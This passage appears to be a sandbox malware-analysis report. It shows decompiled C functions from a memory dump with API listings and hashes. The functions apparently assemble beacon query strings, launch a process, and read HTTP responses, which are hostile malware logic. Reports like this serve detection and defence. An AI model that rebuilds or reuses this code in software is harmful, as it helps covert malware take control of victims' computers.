				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x7ea018; // 0x242da616
				asm("bswap eax");
				_t70 =  *0x7ea014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x7ea010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x7ea00c; // 0xeec43f25
				asm("bswap eax");
				_t73 =  *0x7ea348; // 0x272d5a8
				_t3 = _t73 + 0x7eb5ac; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x7ea02c,  *0x7ea004, _t68);
				_t76 = E007E467F();
				_t77 =  *0x7ea348; // 0x272d5a8
				_t4 = _t77 + 0x7eb575; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x7ea348; // 0x272d5a8
					_t8 = _t148 + 0x7eb508; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x7ea348; // 0x272d5a8
				_t10 = _t81 + 0x7eb89e; // 0x2f18e46
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x7eb246; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x7ea36c; // 0x2f195b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x7ea348; // 0x272d5a8
					_t16 = _t144 + 0x7eb8be; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E007E472F(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x7ea348; // 0x272d5a8
					_t19 = _t139 + 0x7eb8d0; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x7ea2d8, 0, _a40);
				}
				_t87 = E007E1340();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x7ea348; // 0x272d5a8
					_t23 = _t135 + 0x7eb8c5; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x7ea2d8, 0, _a40);
				}
				_t166 =  *0x7ea3cc; // 0x2f19600
				_t89 = E007E6B59( &E007EA00A, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x7ea2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x7ea2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x7ea2d8, _t172, _a8);
						goto L30;
					}
					E007E2915(GetTickCount());
					_t96 =  *0x7ea3cc; // 0x2f19600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x7ea3cc; // 0x2f19600
					__imp__(_t100 + 0x40);
					_t102 =  *0x7ea3cc; // 0x2f19600
					_t168 = E007E6675(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x7ea2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x7e9280);
					_push(_t168);
					_t108 = E007E7563();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x7ea2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E007E6536( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E007E63F6();
						L26:
						HeapFree( *0x7ea2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E007E6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E007E597D(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E007E61DA(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E007E673A(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E007E61DA(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}






























































            0x007e2b91
            0x007e2b91
            0x007e2b95
            0x007e2b9c
            0x007e2ba6
            0x007e2ba8
            0x007e2ba8
            0x007e2bb5
            0x007e2bc0
            0x007e2bc3
            0x007e2bce
            0x007e2bd1
            0x007e2bd6
            0x007e2bd9
            0x007e2bde
            0x007e2be1
            0x007e2bed
            0x007e2bfa
            0x007e2bfc
            0x007e2c02
            0x007e2c07
            0x007e2c12
            0x007e2c14
            0x007e2c17
            0x007e2c1e
            0x007e2c20
            0x007e2c29
            0x007e2c34
            0x007e2c36
            0x007e2c39
            0x007e2c39
            0x007e2c3b
            0x007e2c40
            0x007e2c40
            0x007e2c48
            0x007e2c4c
            0x007e2c52
            0x007e2c5d
            0x007e2c5f
            0x007e2c64
            0x007e2c69
            0x007e2c6c
            0x007e2c71
            0x007e2c7c
            0x007e2c7e
            0x007e2c81
            0x007e2c81
            0x007e2c83
            0x007e2c8e
            0x007e2c94
            0x007e2c97
            0x007e2c9c
            0x007e2ca7
            0x007e2ca9
            0x007e2cb0
            0x007e2cba
            0x007e2cba
            0x007e2cbc
            0x007e2cc1
            0x007e2cc7
            0x007e2cca
            0x007e2ccf
            0x007e2cd9
            0x007e2cdb
            0x007e2cea
            0x007e2cea
            0x007e2cec
            0x007e2cfa
            0x007e2cff
            0x007e2d01
            0x007e2d07
            0x007e2ee7
            0x007e2eef
            0x007e2efc
            0x007e2d0d
            0x007e2d19
            0x007e2d1f
            0x007e2d25
            0x007e2eda
            0x007e2ee5
            0x00000000
            0x007e2ee5
            0x007e2d31
            0x007e2d36
            0x007e2d3f
            0x007e2d50
            0x007e2d54
            0x007e2d5d
            0x007e2d63
            0x007e2d70
            0x007e2d7d
            0x007e2d83
            0x007e2ecd
            0x007e2ed8
            0x00000000
            0x007e2ed8
            0x007e2d8f
            0x007e2d95
            0x007e2d96
            0x007e2d9b
            0x007e2da1
            0x007e2ec3
            0x007e2ecb
            0x00000000
            0x007e2ecb
            0x007e2dab
            0x007e2db2
            0x007e2dbc
            0x007e2dc2
            0x007e2dcc
            0x007e2dde
            0x007e2de0
            0x007e2de6
            0x007e2eff
            0x007e2eae
            0x007e2eae
            0x007e2eb3
            0x007e2ebf
            0x007e2ec1
            0x00000000
            0x007e2ec1
            0x007e2df1
            0x007e2df6
            0x007e2dfc
            0x007e2e07
            0x007e2e12
            0x007e2e16
            0x007e2e1c
            0x007e2e22
            0x007e2e28
            0x007e2e2b
            0x007e2e31
            0x007e2e34
            0x007e2e39
            0x007e2e3d
            0x007e2e3d
            0x007e2e4a
            0x007e2e58
            0x007e2e5d
            0x007e2e5f
            0x007e2e65
            0x007e2e6b
            0x007e2e6d
            0x007e2e72
            0x007e2e76
            0x007e2e92
            0x007e2e92
            0x007e2e65
            0x00000000
            0x007e2e4c
            0x007e2e51
            0x007e2e94
            0x007e2e98
            0x007e2ea2
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x007e2ea2
            0x007e2e53
            0x00000000
            0x007e2e53
            0x007e2e4a

            APIs
            • GetTickCount.KERNEL32 ref: 007E2BA8
            • wsprintfA.USER32 ref: 007E2BF5
            • wsprintfA.USER32 ref: 007E2C12
            • wsprintfA.USER32 ref: 007E2C34
            • wsprintfA.USER32 ref: 007E2C5B
            • wsprintfA.USER32 ref: 007E2C7C
            • wsprintfA.USER32 ref: 007E2CA7
            • HeapFree.KERNEL32(00000000,?), ref: 007E2CBA
            • wsprintfA.USER32 ref: 007E2CD9
            • HeapFree.KERNEL32(00000000,?), ref: 007E2CEA
              • Part of subcall function 007E6B59: RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E6B75
              • Part of subcall function 007E6B59: RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E6B93
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007E2D19
            • GetTickCount.KERNEL32 ref: 007E2D2B
            • RtlEnterCriticalSection.NTDLL(02F195C0), ref: 007E2D3F
            • RtlLeaveCriticalSection.NTDLL(02F195C0), ref: 007E2D5D
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A0
              • Part of subcall function 007E6675: lstrlen.KERNEL32(00000000,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66A8
              • Part of subcall function 007E6675: strcpy.NTDLL ref: 007E66BF
              • Part of subcall function 007E6675: lstrcat.KERNEL32(00000000,00000000), ref: 007E66CA
              • Part of subcall function 007E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007E3ECE,?,7491C740,007E3ECE,00000000,02F19600), ref: 007E66E7
            • StrTrimA.SHLWAPI(00000000,007E9280,?,02F19600), ref: 007E2D8F
              • Part of subcall function 007E7563: lstrlen.KERNEL32(02F19C38,00000000,00000000,00000000,007E3EF9,00000000), ref: 007E7573
              • Part of subcall function 007E7563: lstrlen.KERNEL32(?), ref: 007E757B
              • Part of subcall function 007E7563: lstrcpy.KERNEL32(00000000,02F19C38), ref: 007E758F
              • Part of subcall function 007E7563: lstrcat.KERNEL32(00000000,?), ref: 007E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 007E2DB2
            • lstrcpy.KERNEL32(?,?), ref: 007E2DBC
            • lstrcat.KERNEL32(?,?), ref: 007E2DCC
            • lstrcat.KERNEL32(?,00000000), ref: 007E2DD3
              • Part of subcall function 007E6536: lstrlen.KERNEL32(?,00000000,02F19E40,00000000,007E6F0A,02F1A063,43175AC3,?,?,?,?,43175AC3,00000005,007EA00C,4D283A53,?), ref: 007E653D
              • Part of subcall function 007E6536: mbstowcs.NTDLL ref: 007E6566
              • Part of subcall function 007E6536: memset.NTDLL ref: 007E6578
            • wcstombs.NTDLL ref: 007E2E76
              • Part of subcall function 007E597D: SysAllocString.OLEAUT32(?), ref: 007E59B8
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • HeapFree.KERNEL32(00000000,?), ref: 007E2EBF
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007E2ECB
            • HeapFree.KERNEL32(00000000,?,?,02F19600), ref: 007E2ED8
            • HeapFree.KERNEL32(00000000,?), ref: 007E2EE5
            • HeapFree.KERNEL32(00000000,?), ref: 007E2EEF
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
            • String ID:
            • API String ID: 1185349883-0
            • Opcode ID: 4115561a96a62950792ff5cccd2910c7cf011bde42a5e6efe6dea6babc42ff23
            • Instruction ID: c4cee89f22aeb0b8c94451ac21f2a42925a0a5e7189a61f852da79187edf66dd
            • Opcode Fuzzy Hash: 4115561a96a62950792ff5cccd2910c7cf011bde42a5e6efe6dea6babc42ff23
            • Instruction Fuzzy Hash: A0A19972502290EFC711EB65DC88E6A7BE8FF8C344F054928F549DB221D739E846CB66
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E7238 Relevance: 13.6, APIs: 9, Instructions: 145stringCOMMON
            Download Yara Rule
            C-Code - Quality: 43%
            			E007E7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x7ea3dc; // 0x2f19ce8
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E007E6ABD();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E007E6ABD();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E007E42E9(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E007E42E9(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E007E398D(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x7e918c;
						}
						_t70 = E007E5FA1(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E007E33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x7ea348; // 0x272d5a8
								_t102 =  *0x7ea138; // 0x7e7ddd
								_t28 = _t105 + 0x7ebd10; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E007E398D(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x7e9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E007E33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E007E61DA(_v24);
								} else {
									_t92 =  *0x7ea348; // 0x272d5a8
									_t44 = _t92 + 0x7eba20; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E007E61DA(_v8);
						}
						E007E61DA(_v12);
					}
					E007E61DA(_v16);
				}
				return _v28;
			}



































            0x007e723e
            0x007e7246
            0x007e7249
            0x007e7256
            0x007e7259
            0x007e7260
            0x007e7267
            0x007e726a
            0x007e7277
            0x007e727a
            0x007e727d
            0x007e7282
            0x007e7287
            0x007e728f
            0x007e7294
            0x007e7299
            0x007e729f
            0x007e72a3
            0x007e72ac
            0x007e72b0
            0x007e72b2
            0x007e72b2
            0x007e72ba
            0x007e72bf
            0x007e72c4
            0x007e72ca
            0x007e72d1
            0x007e72e2
            0x007e72e9
            0x007e72fb
            0x007e7300
            0x007e7305
            0x007e730e
            0x007e7317
            0x007e7320
            0x007e7336
            0x007e733b
            0x007e733f
            0x007e7343
            0x007e7348
            0x007e734d
            0x007e734f
            0x007e734f
            0x007e7359
            0x007e7362
            0x007e7369
            0x007e7385
            0x007e7389
            0x007e73c2
            0x007e738b
            0x007e738e
            0x007e7396
            0x007e73a7
            0x007e73af
            0x007e73b7
            0x007e73bb
            0x007e73bb
            0x007e7389
            0x007e73ca
            0x007e73ca
            0x007e73d2
            0x007e73d2
            0x007e73da
            0x007e73da
            0x007e73e6

            APIs
            • GetTickCount.KERNEL32 ref: 007E7250
            • lstrlen.KERNEL32(00000000,00000005), ref: 007E72D1
            • lstrlen.KERNEL32(?), ref: 007E72E2
            • lstrlen.KERNEL32(00000000), ref: 007E72E9
            • lstrlenW.KERNEL32(80000002), ref: 007E72F0
            • lstrlen.KERNEL32(?,00000004), ref: 007E7359
            • lstrlen.KERNEL32(?), ref: 007E7362
            • lstrlen.KERNEL32(?), ref: 007E7369
            • lstrlenW.KERNEL32(?), ref: 007E7370
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrlen$CountFreeHeapTick
            • String ID:
            • API String ID: 2535036572-0
            • Opcode ID: 2a4fb85bfb9fbb9928296ab74ae4be2de58f15a000fbd0fae272175c7924b62e
            • Instruction ID: 99b4dce1e22a14fdb21ab99aacd3f74365547a016b70790522c9f61393f12daa
            • Opcode Fuzzy Hash: 2a4fb85bfb9fbb9928296ab74ae4be2de58f15a000fbd0fae272175c7924b62e
            • Instruction Fuzzy Hash: D6518332D0119AEBCF12AFA6CC49DDE7BB5EF48314F058025FA04AB211D739DA11DB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E37DF Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 73%
            			E007E37DF(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E007E6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E007E7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x7ea300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x7ea348; // 0x272d5a8
					_t18 = _t47 + 0x7eb706; // 0x73797325
					_t68 = E007E127E(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x7ea348; // 0x272d5a8
						_t19 = _t50 + 0x7eb86c; // 0x2f18e14
						_t20 = _t50 + 0x7eb3f6; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E007E5B56();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E007E5B56();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x7ea2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E007E61DA(_t70);
				goto L12;
			}


















            0x007e37e7
            0x007e37e7
            0x007e37f6
            0x007e37fd
            0x007e3802
            0x007e390f
            0x007e3916
            0x007e3916
            0x007e3811
            0x007e3819
            0x007e381c
            0x007e3821
            0x007e3836
            0x007e383c
            0x007e383d
            0x007e3840
            0x007e3846
            0x007e3849
            0x007e384e
            0x007e3856
            0x007e3862
            0x007e3866
            0x007e38f6
            0x007e386c
            0x007e386c
            0x007e3871
            0x007e3878
            0x007e388c
            0x007e3890
            0x007e38df
            0x007e3892
            0x007e3893
            0x007e389a
            0x007e38b3
            0x007e38b5
            0x007e38b9
            0x007e38c0
            0x007e38da
            0x007e38c2
            0x007e38cb
            0x007e38d0
            0x007e38d0
            0x007e38c0
            0x007e38ee
            0x007e38ee
            0x007e3866
            0x007e38fd
            0x007e3906
            0x007e390a
            0x00000000

            APIs
              • Part of subcall function 007E6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,007E37FB,?,?,?,?,00000000,00000000), ref: 007E6C1E
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 007E6C40
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 007E6C56
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007E6C6C
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007E6C82
              • Part of subcall function 007E6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007E6C98
            • memset.NTDLL ref: 007E3849
              • Part of subcall function 007E127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,007E3862,73797325), ref: 007E128F
              • Part of subcall function 007E127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 007E12A9
            • GetModuleHandleA.KERNEL32(4E52454B,02F18E14,73797325), ref: 007E387F
            • GetProcAddress.KERNEL32(00000000), ref: 007E3886
            • HeapFree.KERNEL32(00000000,00000000), ref: 007E38EE
              • Part of subcall function 007E5B56: GetProcAddress.KERNEL32(36776F57,007E2425), ref: 007E5B71
            • CloseHandle.KERNEL32(00000000,00000001), ref: 007E38CB
            • CloseHandle.KERNEL32(?), ref: 007E38D0
            • GetLastError.KERNEL32(00000001), ref: 007E38D4
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
            • String ID:
            • API String ID: 3075724336-0
            • Opcode ID: 67829efb4ad5f35d8821c5489239a4579220fc539459c880a1bf23b6ea96d8c6
            • Instruction ID: 98bc54e5fc3ac56427c850a2bbb690521b1f9b245ac1127db15dac3078ab9194
            • Opcode Fuzzy Hash: 67829efb4ad5f35d8821c5489239a4579220fc539459c880a1bf23b6ea96d8c6
            • Instruction Fuzzy Hash: 1D313EB2901289FFDB10AFA5DC89D9EBBBCEB0C344F104565F606A7121D738AE44DB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E3FA5 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E3FA5(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E007E33DC(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E007E61DA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E007E16B2( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














            0x007e3fa5
            0x007e3fa5
            0x007e3fb5
            0x007e3fb8
            0x007e3fbc
            0x007e3fc2
            0x007e3fc7
            0x007e3fe0
            0x007e3ff4
            0x007e3ffb
            0x007e4002
            0x007e4055
            0x007e405b
            0x007e4061
            0x007e409c
            0x007e40a2
            0x00000000
            0x00000000
            0x00000000
            0x007e4061
            0x007e4008
            0x00000000
            0x007e400f
            0x007e401d
            0x007e4020
            0x007e4023
            0x007e402f
            0x007e4033
            0x007e4095
            0x007e4035
            0x007e4047
            0x007e4085
            0x007e4090
            0x007e4049
            0x007e404c
            0x007e4050
            0x007e4050
            0x007e4047
            0x00000000
            0x007e4033
            0x007e4008
            0x007e3fcc
            0x007e3fd2
            0x007e3fd5
            0x007e3fda
            0x00000000
            0x00000000
            0x00000000
            0x007e406a
            0x007e4072
            0x007e4077
            0x007e407a
            0x00000000

            APIs
            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 007E3FBC
            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,007E3F34,00000000,?), ref: 007E3FCC
            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 007E3FFE
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 007E4023
            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 007E4043
            • GetLastError.KERNEL32 ref: 007E4055
              • Part of subcall function 007E16B2: WaitForMultipleObjects.KERNEL32(00000002,007E7C47,00000000,007E7C47,?,?,?,007E7C47,0000EA60), ref: 007E16CD
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • GetLastError.KERNEL32(00000000), ref: 007E408A
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
